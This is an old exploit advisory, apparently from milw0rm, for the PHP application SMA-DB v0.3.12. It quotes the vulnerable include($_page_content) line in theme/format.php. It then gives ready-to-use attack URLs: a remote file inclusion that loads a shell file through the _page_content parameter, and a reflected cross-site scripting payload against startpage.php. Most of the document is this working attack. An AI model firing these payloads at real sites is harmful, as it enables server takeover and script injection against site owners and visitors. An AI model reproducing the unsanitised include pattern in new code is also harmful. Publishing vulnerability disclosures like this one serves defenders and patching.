32 lines
No EOL
971 B
Text
32 lines
No EOL
971 B
Text
-----------------:Remote File Include/cross site script:-----------------
|
|
|
|
script:SMA-DB v0.3.12
|
|
|
|
------------------------------------------------------------------
|
|
download from:http://bluevirus.ch/media/downloads/SMA-DB_v0.3.12.zip
|
|
|
|
------------------------------------------------------------------
|
|
........................................................
|
|
vul:/theme/format.php
|
|
|
|
|
|
<?php include($_page_content);?> line 49
|
|
|
|
------------------------------------------------------
|
|
-----------------------------------------------------
|
|
xpl:
|
|
|
|
http://127.0..0.1/path/theme/format.php?_page_content=[shell.txt?]
|
|
|
|
xss:
|
|
http://127.0.0.1/path/startpage.php/>"><ScRiPt>alert(0)</ScRiPt>
|
|
|
|
***************************************************
|
|
***************************************************
|
|
---------------------------------------------------
|
|
Author: ahmadbady [kivi_hacker666@yahoo.com]
|
|
|
|
from[iran]
|
|
---------------------------------------------------
|
|
|
|
# milw0rm.com [2009-02-02] |